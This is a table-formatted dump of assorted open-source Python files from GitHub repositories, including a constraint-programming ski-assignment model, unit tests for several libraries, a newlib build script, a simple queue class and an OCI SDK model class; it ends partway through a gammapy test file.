max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
cpmpy/ski_assignment.py | tias/hakank | 279 | 12795286 | <gh_stars>100-1000
"""
Ski assignment in cpmpy
From <NAME>, Jr.:
PIC 60, Fall 2008 Final Review, December 12, 2008
http://www.math.ucla.edu/~jhellrun/course_files/Fall%25202008/PIC%252060%2520-%2520Data%2520Structures%2520and%2520Algorithms/final_review.pdf
'''
5. Ski Optimization! Your job at Snapple is pleasant but in the winter
you've decided to become a ski bum. You've hooked up with the Mount
Baldy Ski Resort. They'll let you ski all winter for free in exchange
for helping their ski rental shop with an algorithm to assign skis to
skiers. Ideally, each skier should obtain a pair of skis whose height
matches his or her own height exactly. Unfortunately, this is generally
not possible. We define the disparity between a skier and his or her
skis to be the absolute value of the difference between the height of
the skier and the pair of skis. Our objective is to find an assignment
of skis to skiers that minimizes the sum of the disparities.
...
Illustrate your algorithm by explicitly filling out the A[i, j] table
for the following sample data:
* Ski heights: 1, 2, 5, 7, 13, 21.
* Skier heights: 3, 4, 7, 11, 18.
'''
This cpmpy model was written by <NAME> (<EMAIL>)
See also my cpmpy page: http://hakank.org/cpmpy/
"""
from cpmpy import *
import cpmpy.solvers
import numpy as np
from cpmpy_hakank import *
def ski_assignment():
# data
num_skis = 6
num_skiers = 5
ski_heights = [1, 2, 5, 7, 13, 21]
skier_heights = [3, 4, 7, 11, 18]
# which ski to choose for each skier
x = intvar(0,num_skis-1,shape=num_skiers,name="x")
z = intvar(0, sum(ski_heights), name="z")
model = Model(minimize=z)
# constraints
model += [AllDifferent(x)]
# model += [z == sum([abs(ski_heights[x[i]] - skier_heights[i]) for i in range(num_skiers)] )]
model += [z == sum([abs(Element(ski_heights,x[i]) - skier_heights[i]) for i in range(num_skiers)] )]
ss = CPM_ortools(model)
num_solutions = 0
if ss.solve():
num_solutions += 1
print("total differences:", z.value())
for i in range(num_skiers):
x_val = x[i].value()
ski_height = ski_heights[x[i].value()]
diff = ski_height - skier_heights[i]
print('Skier %i: Ski %i with length %2i (diff: %2i)' %\
(i, x_val, ski_height, diff))
print()
print()
print('num_solutions:', num_solutions)
return ss
ss = ski_assignment()
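# A minimal brute-force cross-check (a sketch, not part of the original model):
# it enumerates every injective assignment of skis to skiers and returns the
# minimum total disparity, which the CP solution above should match.
from itertools import permutations

def brute_force_min_disparity(ski_heights, skier_heights):
    """Return the minimum sum of |ski - skier| over all injective assignments."""
    return min(
        sum(abs(ski_heights[p] - h) for p, h in zip(perm, skier_heights))
        for perm in permutations(range(len(ski_heights)), len(skier_heights))
    )

# Example with the sample data from the problem statement:
# brute_force_min_disparity([1, 2, 5, 7, 13, 21], [3, 4, 7, 11, 18])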
|
plugins/supervisor/__init__.py | ajenti/ajen | 3,777 | 12795309 | <gh_stars>1000+
# pyflakes: disable-all
from .api import *
from .aug import *
from .main import *
|
aries_cloudagent/did/tests/test_did_key_bls12381g1.py | kuraakhilesh8230/aries-cloudagent-python | 247 | 12795332 | from unittest import TestCase
from ...wallet.key_type import KeyType
from ...wallet.util import b58_to_bytes
from ..did_key import DIDKey, DID_KEY_RESOLVERS
from .test_dids import (
DID_B<KEY>,
)
TEST_BLS12381G1_BASE58_KEY = (
"<KEY>"
)
TEST_BLS12381G1_FINGERPRINT = (
"<KEY>"
)
TEST_BLS12381G1_DID = f"did:key:{TEST_BLS12381G1_FINGERPRINT}"
TEST_BLS12381G1_KEY_ID = f"{TEST_BLS12381G1_DID}#{TEST_BLS12381G1_FINGERPRINT}"
TEST_BLS12381G1_PREFIX_BYTES = b"".join(
[b"\xea\x01", b58_to_bytes(TEST_BLS12381G1_BASE58_KEY)]
)
class TestDIDKey(TestCase):
def test_bls12381g1_from_public_key(self):
key_bytes = b58_to_bytes(TEST_BLS12381G1_BASE58_KEY)
did_key = DIDKey.from_public_key(key_bytes, KeyType.BLS12381G1)
assert did_key.did == TEST_BLS12381G1_DID
def test_bls12381g1_from_public_key_b58(self):
did_key = DIDKey.from_public_key_b58(
TEST_BLS12381G1_BASE58_KEY, KeyType.BLS12381G1
)
assert did_key.did == TEST_BLS12381G1_DID
def test_bls12381g1_from_fingerprint(self):
did_key = DIDKey.from_fingerprint(TEST_BLS12381G1_FINGERPRINT)
assert did_key.did == TEST_BLS12381G1_DID
assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY
def test_bls12381g1_from_did(self):
did_key = DIDKey.from_did(TEST_BLS12381G1_DID)
assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY
def test_bls12381g1_properties(self):
did_key = DIDKey.from_did(TEST_BLS12381G1_DID)
assert did_key.fingerprint == TEST_BLS12381G1_FINGERPRINT
assert did_key.did == TEST_BLS12381G1_DID
assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY
assert did_key.public_key == b58_to_bytes(TEST_BLS12381G1_BASE58_KEY)
assert did_key.key_type == KeyType.BLS12381G1
assert did_key.key_id == TEST_BLS12381G1_KEY_ID
assert did_key.prefixed_public_key == TEST_BLS12381G1_PREFIX_BYTES
def test_bls12381g1_diddoc(self):
did_key = DIDKey.from_did(TEST_BLS12381G1_DID)
resolver = DID_KEY_RESOLVERS[KeyType.BLS12381G1]
assert resolver(did_key) == did_key.did_doc
def test_bls12381g1_resolver(self):
did_key = DIDKey.from_did(TEST_BLS12381G1_DID)
resolver = DID_KEY_RESOLVERS[KeyType.BLS12381G1]
did_doc = resolver(did_key)
assert (
did_doc
== DID_BLS12381G1_z3tEFALUKUzzCAvytMHX8X4SnsNsq6T5tC5Zb18oQEt1FqNcJXqJ3AA9umgzA9yoqPBeWA
)
|
qb_to_dynaboard.py | Pinafore/qb | 122 | 12795346 | <gh_stars>100-1000
import argparse
import json
from pathlib import Path
DS_VERSION = "2018.04.18"
LOCAL_QANTA_PREFIX = "data/external/datasets/"
QANTA_TRAIN_DATASET_PATH = f"qanta.train.{DS_VERSION}.json"
QANTA_DEV_DATASET_PATH = f"qanta.dev.{DS_VERSION}.json"
QANTA_TEST_DATASET_PATH = f"qanta.test.{DS_VERSION}.json"
def main():
parser = argparse.ArgumentParser()
parser.add_argument('output_dir', type=str)
args = parser.parse_args()
output_dir = Path(args.output_dir)
output_dir.mkdir(exist_ok=True, parents=True)
for split, path in [('train', QANTA_TRAIN_DATASET_PATH), ('dev', QANTA_DEV_DATASET_PATH), ('test', QANTA_TEST_DATASET_PATH)]:
with open(Path(LOCAL_QANTA_PREFIX) / path) as f:
data = json.load(f)
output = []
for q in data['questions']:
output.append({'uid': q['qanta_id'], 'question': q['text'], 'answer': q['page'], 'context': ''})
with open(output_dir / f'qb-{split}-{DS_VERSION}.jsonl', 'w') as f:
for r in output:
f.write(f'{json.dumps(r)}\n')
if __name__ == '__main__':
main() |
tests/test_microsoft_trans.py | nidhaloff/deep_translator | 118 | 12795365 | <filename>tests/test_microsoft_trans.py
#!/usr/bin/env python
"""Tests for `deep_translator` package."""
from unittest.mock import patch
import pytest
import requests
from deep_translator import MicrosoftTranslator, exceptions
# mocked request.post
@patch.object(requests, "post")
def test_microsoft_successful_post_mock(mock_request_post):
returned_json = [{"translations": [{"text": "See you later!", "to": "en"}]}]
def res():
r = requests.Response()
def json_func():
return returned_json
r.json = json_func
return r
mock_request_post.return_value = res()
assert (
MicrosoftTranslator(api_key="an_api_key", source="de", target="en").translate(
"auf wiedersehen!"
)
== "See you later!"
)
def test_MicrosoftAPIerror():
with pytest.raises(exceptions.MicrosoftAPIerror):
MicrosoftTranslator(api_key="empty", source="de", target="en").translate("text")
# the remaining tests are actual requests to Microsoft API and use an api key
# if APIkey variable is None, they are skipped
APIkey = None
@pytest.mark.skipif(APIkey is None, reason="api_key is not provided")
def test_microsoft_successful_post_onetarget():
posted = MicrosoftTranslator(api_key=APIkey, target="en").translate(
"auf wiedersehen!"
)
assert isinstance(posted, str)
@pytest.mark.skipif(APIkey is None, reason="api_key is not provided")
def test_microsoft_successful_post_twotargets():
posted = MicrosoftTranslator(api_key=APIkey, target=["en", "ru"]).translate(
"auf wiedersehen!"
)
assert isinstance(posted, str)
@pytest.mark.skipif(APIkey is None, reason="api_key is not provided")
def test_incorrect_target_attributes():
with pytest.raises(exceptions.ServerException):
MicrosoftTranslator(api_key=APIkey, target="")
with pytest.raises(exceptions.ServerException):
MicrosoftTranslator(api_key="", target="nothing")
@pytest.mark.skipif(APIkey is None, reason="api_key is not provided")
def test_abbreviations():
m1 = MicrosoftTranslator(api_key=APIkey, source="en", target="fr")
m2 = MicrosoftTranslator(api_key=APIkey, source="English", target="French")
assert "".join(m1._source) == "".join(m2._source)
assert "".join(m1._target) == "".join(m2._target)
|
build_newlib.py | codyd51/axle | 453 | 12795366 | <reponame>codyd51/axle<filename>build_newlib.py
#!/usr/bin/python3
import os
import tempfile
from pathlib import Path
from typing import Tuple
from build_utils import download_and_unpack_archive, run_and_check
def clone_tool_and_prepare_build_dir(build_dir: Path, url: str) -> Tuple[Path, Path]:
tool_src_dir = download_and_unpack_archive(build_dir, url)
tool_name = url.split("/")[-1].removesuffix(".tar.gz")
tool_build_dir = build_dir / f"build-{tool_name}"
tool_build_dir.mkdir(exist_ok=True)
return tool_src_dir, tool_build_dir
def build() -> None:
axle_dir = Path(__file__).parent
sysroot_dir = axle_dir / "axle-sysroot"
arch_target = "i686-elf"
toolchain_dir = axle_dir / "i686-toolchain"
binaries_dir = toolchain_dir / "bin"
with tempfile.TemporaryDirectory() as build_dir_raw:
build_dir = Path(build_dir_raw)
build_products_dir = Path(__file__).parent / "newlib-build-products"
if False:
automake_src_dir, automake_build_dir = clone_tool_and_prepare_build_dir(
build_dir, "https://ftp.gnu.org/gnu/automake/automake-1.11.tar.gz"
)
automake_configure_path = automake_src_dir / "configure"
run_and_check(
[automake_configure_path.as_posix(), f"--prefix={build_products_dir}"], cwd=automake_build_dir
)
run_and_check(["make"], cwd=automake_build_dir)
run_and_check(["make", "install"], cwd=automake_build_dir)
autoconf_src_dir, autoconf_build_dir = clone_tool_and_prepare_build_dir(
build_dir, "https://ftp.gnu.org/gnu/autoconf/autoconf-2.65.tar.gz"
)
autoconf_configure_path = autoconf_src_dir / "configure"
run_and_check(
[autoconf_configure_path.as_posix(), f"--prefix={build_products_dir}"], cwd=autoconf_build_dir
)
run_and_check(["make"], cwd=autoconf_build_dir)
run_and_check(["make", "install"], cwd=autoconf_build_dir)
newlib_src_dir = axle_dir / "ports" / "newlib" / "newlib-2.5.0.20171222"
newlib_build_dir = build_dir / "build-newlib"
newlib_build_dir.mkdir()
os.symlink((binaries_dir / "i686-elf-ar").as_posix(), (newlib_build_dir / "i686-axle-ar").as_posix())
os.symlink((binaries_dir / "i686-elf-as").as_posix(), (newlib_build_dir / "i686-axle-as").as_posix())
os.symlink((binaries_dir / "i686-elf-gcc").as_posix(), (newlib_build_dir / "i686-axle-gcc").as_posix())
os.symlink((binaries_dir / "i686-elf-cc").as_posix(), (newlib_build_dir / "i686-axle-cc").as_posix())
os.symlink((binaries_dir / "i686-elf-ranlib").as_posix(), (newlib_build_dir / "i686-axle-ranlib").as_posix())
env = {"PATH": f'{newlib_build_dir}:{os.environ["PATH"]}'}
newlib_configure_path = newlib_src_dir / "configure"
run_and_check(
[newlib_configure_path.as_posix(), "--prefix=/usr", "--target=i686-axle"],
cwd=newlib_build_dir,
env_additions=env,
)
run_and_check(["make", "all"], cwd=newlib_build_dir, env_additions=env)
run_and_check(["make", f"DESTDIR={sysroot_dir.as_posix()}", "install"], cwd=newlib_build_dir, env_additions=env)
# If you make some kind of config change to the axle target, such as adding new files within the newlib port,
# you may have to run this command
# You may see an error like the following while running this script:
# /bin/sh: /Users/philliptennen/Documents/develop/axle/ports/newlib/newlib-2.5.0.20171222/etc/configure: No such file or directory
# ../newlib-2.5.0.20171222/configure --prefix=/usr --target=i686-axle
# Fail when newlib doesn't compile
# set -e
# make all
if __name__ == "__main__":
build()
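# A hypothetical sketch of the `run_and_check` helper imported from build_utils
# (its real implementation is not shown in this file): run a command in a given
# directory with optional extra environment variables and fail on a non-zero
# exit status.
#
# import os, subprocess
# def run_and_check(cmd, cwd=None, env_additions=None):
#     env = dict(os.environ, **(env_additions or {}))
#     subprocess.run(cmd, cwd=cwd, env=env, check=True)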
|
berts_of_a_feather/files_for_replication/process_test_results.py | tommccoy1/hans | 109 | 12795393 | import sys
prefix = sys.argv[1]
fi = open(prefix + "/" + "test_results.tsv", "r")
fo = open(prefix + "/" + "preds.txt", "w")
fo.write("pairID,gold_label\n")
counter = 0
labels = ["contradiction", "entailment", "neutral"]
for line in fi:
parts = [float(x) for x in line.strip().split("\t")]
max_ind = 0
max_val = parts[0]
for ind, part in enumerate(parts):
if part > max_val:
max_val = part
max_ind = ind
fo.write("ex" + str(counter) + "," + labels[max_ind] + "\n")
counter += 1
|
reboot_required/tests/test_reboot_required.py | divyamamgai/integrations-extras | 158 | 12795426 | # (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
from os.path import isfile
def test_ok(aggregator, check, instance_ok):
assert isfile(instance_ok['created_at_file'])
check.check(instance_ok)
aggregator.assert_service_check('system.reboot_required', status=check.OK)
def test_not_present_ok(aggregator, check, instance_not_present):
assert not isfile(instance_not_present['created_at_file'])
check.check(instance_not_present)
aggregator.assert_service_check('system.reboot_required', status=check.OK)
def test_warning(aggregator, check, instance_warning):
check.check(instance_warning)
aggregator.assert_service_check('system.reboot_required', status=check.WARNING)
def test_critical(aggregator, check, instance_critical):
check.check(instance_critical)
aggregator.assert_service_check('system.reboot_required', status=check.CRITICAL)
|
src/network/assemble.py | BeholdersEye/PyBitmessage | 1,583 | 12795427 | <gh_stars>1000+
"""
Create bitmessage protocol command packets
"""
import struct
import addresses
from network.constants import MAX_ADDR_COUNT
from network.node import Peer
from protocol import CreatePacket, encodeHost
def assemble_addr(peerList):
"""Create address command"""
if isinstance(peerList, Peer):
peerList = [peerList]
if not peerList:
return b''
retval = b''
for i in range(0, len(peerList), MAX_ADDR_COUNT):
payload = addresses.encodeVarint(len(peerList[i:i + MAX_ADDR_COUNT]))
for stream, peer, timestamp in peerList[i:i + MAX_ADDR_COUNT]:
# 64-bit time
payload += struct.pack('>Q', timestamp)
payload += struct.pack('>I', stream)
# service bit flags offered by this node
payload += struct.pack('>q', 1)
payload += encodeHost(peer.host)
# remote port
payload += struct.pack('>H', peer.port)
retval += CreatePacket('addr', payload)
return retval
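# A minimal, hypothetical usage sketch (not part of the original module); it
# assumes a Peer can be constructed as Peer(host, port), which is defined in
# network.node and not shown here:
#
# import time
# packet = assemble_addr([(1, Peer('203.0.113.1', 8444), int(time.time()))])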
|
src/oci/apm_traces/models/query_result_metadata_summary.py | Manny27nyc/oci-python-sdk | 249 | 12795454 | <gh_stars>100-1000
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class QueryResultMetadataSummary(object):
"""
Summary containing the metadata about the query result set.
"""
def __init__(self, **kwargs):
"""
Initializes a new QueryResultMetadataSummary object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param query_result_row_type_summaries:
The value to assign to the query_result_row_type_summaries property of this QueryResultMetadataSummary.
:type query_result_row_type_summaries: list[oci.apm_traces.models.QueryResultRowTypeSummary]
:param source_name:
The value to assign to the source_name property of this QueryResultMetadataSummary.
:type source_name: str
:param query_results_grouped_by:
The value to assign to the query_results_grouped_by property of this QueryResultMetadataSummary.
:type query_results_grouped_by: list[oci.apm_traces.models.QueryResultsGroupedBySummary]
:param query_results_ordered_by:
The value to assign to the query_results_ordered_by property of this QueryResultMetadataSummary.
:type query_results_ordered_by: list[oci.apm_traces.models.QueryResultsOrderedBySummary]
:param time_series_interval_in_mins:
The value to assign to the time_series_interval_in_mins property of this QueryResultMetadataSummary.
:type time_series_interval_in_mins: int
"""
self.swagger_types = {
'query_result_row_type_summaries': 'list[QueryResultRowTypeSummary]',
'source_name': 'str',
'query_results_grouped_by': 'list[QueryResultsGroupedBySummary]',
'query_results_ordered_by': 'list[QueryResultsOrderedBySummary]',
'time_series_interval_in_mins': 'int'
}
self.attribute_map = {
'query_result_row_type_summaries': 'queryResultRowTypeSummaries',
'source_name': 'sourceName',
'query_results_grouped_by': 'queryResultsGroupedBy',
'query_results_ordered_by': 'queryResultsOrderedBy',
'time_series_interval_in_mins': 'timeSeriesIntervalInMins'
}
self._query_result_row_type_summaries = None
self._source_name = None
self._query_results_grouped_by = None
self._query_results_ordered_by = None
self._time_series_interval_in_mins = None
@property
def query_result_row_type_summaries(self):
"""
Gets the query_result_row_type_summaries of this QueryResultMetadataSummary.
A collection of QueryResultRowTypeSummary objects that describe the type and properties of the individual row elements of the query rows
being returned. The ith element in this list contains the QueryResultRowTypeSummary of the ith key value pair in the QueryResultRowData map.
:return: The query_result_row_type_summaries of this QueryResultMetadataSummary.
:rtype: list[oci.apm_traces.models.QueryResultRowTypeSummary]
"""
return self._query_result_row_type_summaries
@query_result_row_type_summaries.setter
def query_result_row_type_summaries(self, query_result_row_type_summaries):
"""
Sets the query_result_row_type_summaries of this QueryResultMetadataSummary.
A collection of QueryResultRowTypeSummary objects that describe the type and properties of the individual row elements of the query rows
being returned. The ith element in this list contains the QueryResultRowTypeSummary of the ith key value pair in the QueryResultRowData map.
:param query_result_row_type_summaries: The query_result_row_type_summaries of this QueryResultMetadataSummary.
:type: list[oci.apm_traces.models.QueryResultRowTypeSummary]
"""
self._query_result_row_type_summaries = query_result_row_type_summaries
@property
def source_name(self):
"""
Gets the source_name of this QueryResultMetadataSummary.
Source of the query result set (traces, spans, etc).
:return: The source_name of this QueryResultMetadataSummary.
:rtype: str
"""
return self._source_name
@source_name.setter
def source_name(self, source_name):
"""
Sets the source_name of this QueryResultMetadataSummary.
Source of the query result set (traces, spans, etc).
:param source_name: The source_name of this QueryResultMetadataSummary.
:type: str
"""
self._source_name = source_name
@property
def query_results_grouped_by(self):
"""
Gets the query_results_grouped_by of this QueryResultMetadataSummary.
Columns or attributes of the query rows which are group by values. This is a list of ResultsGroupedBy summary objects,
and the list will contain as many elements as the attributes and aggregate functions in the group by clause in the select query.
:return: The query_results_grouped_by of this QueryResultMetadataSummary.
:rtype: list[oci.apm_traces.models.QueryResultsGroupedBySummary]
"""
return self._query_results_grouped_by
@query_results_grouped_by.setter
def query_results_grouped_by(self, query_results_grouped_by):
"""
Sets the query_results_grouped_by of this QueryResultMetadataSummary.
Columns or attributes of the query rows which are group by values. This is a list of ResultsGroupedBy summary objects,
and the list will contain as many elements as the attributes and aggregate functions in the group by clause in the select query.
:param query_results_grouped_by: The query_results_grouped_by of this QueryResultMetadataSummary.
:type: list[oci.apm_traces.models.QueryResultsGroupedBySummary]
"""
self._query_results_grouped_by = query_results_grouped_by
@property
def query_results_ordered_by(self):
"""
Gets the query_results_ordered_by of this QueryResultMetadataSummary.
Order by which the query results are organized. This is a list of queryResultsOrderedBy summary objects, and the list
will contain more than one OrderedBy summary object, if the sort was multidimensional.
:return: The query_results_ordered_by of this QueryResultMetadataSummary.
:rtype: list[oci.apm_traces.models.QueryResultsOrderedBySummary]
"""
return self._query_results_ordered_by
@query_results_ordered_by.setter
def query_results_ordered_by(self, query_results_ordered_by):
"""
Sets the query_results_ordered_by of this QueryResultMetadataSummary.
Order by which the query results are organized. This is a list of queryResultsOrderedBy summary objects, and the list
will contain more than one OrderedBy summary object, if the sort was multidimensional.
:param query_results_ordered_by: The query_results_ordered_by of this QueryResultMetadataSummary.
:type: list[oci.apm_traces.models.QueryResultsOrderedBySummary]
"""
self._query_results_ordered_by = query_results_ordered_by
@property
def time_series_interval_in_mins(self):
"""
Gets the time_series_interval_in_mins of this QueryResultMetadataSummary.
Interval for the time series function in minutes.
:return: The time_series_interval_in_mins of this QueryResultMetadataSummary.
:rtype: int
"""
return self._time_series_interval_in_mins
@time_series_interval_in_mins.setter
def time_series_interval_in_mins(self, time_series_interval_in_mins):
"""
Sets the time_series_interval_in_mins of this QueryResultMetadataSummary.
Interval for the time series function in minutes.
:param time_series_interval_in_mins: The time_series_interval_in_mins of this QueryResultMetadataSummary.
:type: int
"""
self._time_series_interval_in_mins = time_series_interval_in_mins
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
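# A minimal usage sketch (an illustration, not part of the SDK source): the
# attributes can be populated through the property setters defined above,
# and the object prints as a flat dict via __repr__.
#
# summary = QueryResultMetadataSummary()
# summary.source_name = 'traces'
# summary.time_series_interval_in_mins = 5
# print(summary)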
|
queue/queue.py | Sherlock-dev/algos | 1,126 | 12795467 | class Queue(object):
def __init__(self):
self._list = []
def count(self):
return len(self._list)
def is_empty(self):
return self.count() == 0
def enqueue(self, item):
self._list.append(item)
def dequeue(self):
try:
return self._list.pop(0)
except IndexError:
            raise IndexError('dequeue from empty queue')
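# A minimal O(1) variant of the queue above (an illustrative sketch, not part
# of the original file): collections.deque avoids the O(n) cost of list.pop(0),
# which shifts every remaining item one slot to the left.
from collections import deque

class DequeQueue(object):
    def __init__(self):
        self._items = deque()

    def count(self):
        return len(self._items)

    def is_empty(self):
        return self.count() == 0

    def enqueue(self, item):
        self._items.append(item)

    def dequeue(self):
        try:
            return self._items.popleft()
        except IndexError:
            raise IndexError('dequeue from empty queue')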
def main():
queue = Queue()
n = 100
print('Empty queue: {0}'.format(queue.is_empty()))
while queue.count() < 5:
print('pushing elements: {0}'.format(n))
queue.enqueue(n)
n = n + 100
print('Number of items: {0}'.format(queue.count()))
print('Empty queue: {0}'.format(queue.is_empty()))
while True:
try:
print('Removing element: {0}'.format(queue.dequeue()))
except Exception as e:
print('Exception: {0}'.format(e))
break
print('Number of items: {0}'.format(queue.count()))
print('Empty queue: {0}'.format(queue.is_empty()))
if __name__ == '__main__':
main()
|
mpire/signal.py | synapticarbors/mpire | 505 | 12795499 | from inspect import Traceback
from signal import getsignal, SIG_IGN, SIGINT, signal as signal_, Signals
from types import FrameType
from typing import Type
class DelayedKeyboardInterrupt:
def __init__(self, in_thread: bool = False) -> None:
"""
        :param in_thread: Whether we are running inside a thread
"""
self.in_thread = in_thread
self.signal_received = None
def __enter__(self) -> None:
# When we're in a thread we can't use signal handling
if not self.in_thread:
self.signal_received = False
self.old_handler = signal_(SIGINT, self.handler)
def handler(self, sig: Signals, frame: FrameType) -> None:
self.signal_received = (sig, frame)
def __exit__(self, exc_type: Type, exc_val: Exception, exc_tb: Traceback) -> None:
if not self.in_thread:
signal_(SIGINT, self.old_handler)
if self.signal_received:
self.old_handler(*self.signal_received)
class DisableKeyboardInterruptSignal:
def __enter__(self) -> None:
# Prevent signal from propagating to child process
self._handler = getsignal(SIGINT)
ignore_keyboard_interrupt()
def __exit__(self, exc_type: Type, exc_val: Exception, exc_tb: Traceback) -> None:
# Restore signal
signal_(SIGINT, self._handler)
def ignore_keyboard_interrupt():
signal_(SIGINT, SIG_IGN)
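# A minimal usage sketch (an illustration, not from the original module): defer
# Ctrl+C while a critical section runs; the stored SIGINT is re-raised by the
# old handler when the block exits.
#
# with DelayedKeyboardInterrupt():
#     write_checkpoint_to_disk()  # hypothetical uninterruptible work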
|
airbyte-integrations/bases/source-acceptance-test/source_acceptance_test/tests/test_full_refresh.py | koji-m/airbyte | 6,215 | 12795507 | <filename>airbyte-integrations/bases/source-acceptance-test/source_acceptance_test/tests/test_full_refresh.py
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import pytest
from airbyte_cdk.models import Type
from source_acceptance_test.base import BaseTest
from source_acceptance_test.utils import ConnectorRunner, full_refresh_only_catalog, serialize
@pytest.mark.default_timeout(20 * 60)
class TestFullRefresh(BaseTest):
def test_sequential_reads(self, connector_config, configured_catalog, docker_runner: ConnectorRunner, detailed_logger):
configured_catalog = full_refresh_only_catalog(configured_catalog)
output = docker_runner.call_read(connector_config, configured_catalog)
records_1 = [message.record.data for message in output if message.type == Type.RECORD]
output = docker_runner.call_read(connector_config, configured_catalog)
records_2 = [message.record.data for message in output if message.type == Type.RECORD]
output_diff = set(map(serialize, records_1)) - set(map(serialize, records_2))
if output_diff:
msg = "The two sequential reads should produce either equal set of records or one of them is a strict subset of the other"
detailed_logger.info(msg)
detailed_logger.log_json_list(output_diff)
pytest.fail(msg)
|
gammapy/astro/population/tests/test_simulate.py | Rishank2610/gammapy | 155 | 12795523 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
from numpy.testing import assert_allclose, assert_equal
import astropy.units as u
from astropy.table import Table
from gammapy.astro.population import (
add_observed_parameters,
add_pulsar_parameters,
add_pwn_parameters,
add_snr_parameters,
make_base_catalog_galactic,
make_catalog_random_positions_cube,
make_catalog_random_positions_sphere,
)
def test_make_catalog_random_positions_cube():
table = make_catalog_random_positions_cube(random_state=0)
d = table[0]
assert len(table) == 100
assert len(table.colnames) == 3
assert table["x"].unit == "pc"
assert_allclose(d["x"], 0.0976270078546495)
assert table["y"].unit == "pc"
assert_allclose(d["y"], 0.3556330735924602)
assert table["z"].unit == "pc"
assert_allclose(d["z"], -0.37640823601179485)
table = make_catalog_random_positions_cube(dimension=2, random_state=0)
assert_equal(table["z"], 0)
table = make_catalog_random_positions_cube(dimension=1, random_state=0)
assert_equal(table["y"], 0)
assert_equal(table["z"], 0)
def test_make_catalog_random_positions_sphere():
table = make_catalog_random_positions_sphere(random_state=0)
d = table[0]
assert len(table) == 100
assert len(table.colnames) == 3
assert table["lon"].unit == "rad"
assert_allclose(d["lon"], 3.4482969442579128)
assert table["lat"].unit == "rad"
assert_allclose(d["lat"], 0.36359133530192267)
assert table["distance"].unit == "pc"
assert_allclose(d["distance"], 0.6780943487897606)
def test_make_base_catalog_galactic():
table = make_base_catalog_galactic(n_sources=10, random_state=0)
d = table[0]
assert len(table) == 10
assert len(table.colnames) == 13
assert table["age"].unit == "yr"
assert_allclose(d["age"], 548813.50392732478)
assert table["n_ISM"].unit == "cm-3"
assert_allclose(d["n_ISM"], 1.0)
assert table["spiralarm"].unit is None
assert d["spiralarm"] == "Crux Scutum"
assert table["x_birth"].unit == "kpc"
assert_allclose(d["x_birth"], -5.856461, atol=1e-5)
assert table["y_birth"].unit == "kpc"
assert_allclose(d["y_birth"], 3.017292, atol=1e-5)
assert table["z_birth"].unit == "kpc"
assert_allclose(d["z_birth"], 0.049088, atol=1e-5)
assert table["x"].unit == "kpc"
assert_allclose(d["x"], -5.941061, atol=1e-5)
assert table["y"].unit == "kpc"
assert_allclose(d["y"], 3.081642, atol=1e-5)
assert table["z"].unit == "kpc"
assert_allclose(d["z"], 0.023161, atol=1e-5)
assert table["vx"].unit == "km/s"
assert_allclose(d["vx"], -150.727104, atol=1e-5)
assert table["vy"].unit == "km/s"
assert_allclose(d["vy"], 114.648494, atol=1e-5)
assert table["vz"].unit == "km/s"
assert_allclose(d["vz"], -46.193814, atol=1e-5)
assert table["v_abs"].unit == "km/s"
assert_allclose(d["v_abs"], 194.927693, atol=1e-5)
def test_add_snr_parameters():
table = Table()
table["age"] = [100, 1000] * u.yr
table["n_ISM"] = u.Quantity(1, "cm-3")
table = add_snr_parameters(table)
assert len(table) == 2
assert table.colnames == ["age", "n_ISM", "E_SN", "r_out", "r_in", "L_SNR"]
assert table["E_SN"].unit == "erg"
assert_allclose(table["E_SN"], 1e51)
assert table["r_out"].unit == "pc"
assert_allclose(table["r_out"], [1, 3.80730787743])
assert table["r_in"].unit == "pc"
assert_allclose(table["r_in"], [0.9086, 3.45931993743])
assert table["L_SNR"].unit == "1 / s"
assert_allclose(table["L_SNR"], [0, 1.0768e33])
def test_add_pulsar_parameters():
table = Table()
table["age"] = [100, 1000] * u.yr
table = add_pulsar_parameters(table, random_state=0)
assert len(table) == 2
assert len(table.colnames) == 10
assert table["age"].unit == "yr"
assert_allclose(table["age"], [100, 1000])
assert table["P0"].unit == "s"
assert_allclose(table["P0"], [0.214478, 0.246349], atol=1e-5)
assert table["P1"].unit == ""
assert_allclose(table["P1"], [6.310423e-13, 4.198294e-16], atol=1e-5)
assert table["P0_birth"].unit == "s"
assert_allclose(table["P0_birth"], [0.212418, 0.246336], atol=1e-5)
assert table["P1_birth"].unit == ""
assert_allclose(table["P1_birth"], [6.558773e-13, 4.199198e-16], atol=1e-5)
assert table["CharAge"].unit == "yr"
assert_allclose(table["CharAge"], [2.207394e-21, 1.638930e-24], atol=1e-5)
assert table["Tau0"].unit == "yr"
assert_allclose(table["Tau0"], [5.131385e03, 9.294538e06], atol=1e-5)
assert table["L_PSR"].unit == "erg / s"
assert_allclose(table["L_PSR"], [2.599229e36, 1.108788e33], rtol=1e-5)
assert table["L0_PSR"].unit == "erg / s"
assert_allclose(table["L0_PSR"], [2.701524e36, 1.109026e33], rtol=1e-5)
assert table["B_PSR"].unit == "G"
assert_allclose(table["B_PSR"], [1.194420e13, 3.254597e11], rtol=1e-5)
def test_add_pwn_parameters():
table = make_base_catalog_galactic(n_sources=10, random_state=0)
# To compute PWN parameters we need PSR and SNR parameters first
table = add_snr_parameters(table)
table = add_pulsar_parameters(table, random_state=0)
table = add_pwn_parameters(table)
d = table[0]
assert len(table) == 10
assert len(table.colnames) == 27
assert table["r_out_PWN"].unit == "pc"
assert_allclose(d["r_out_PWN"], 1.378224, atol=1e-4)
def test_add_observed_parameters():
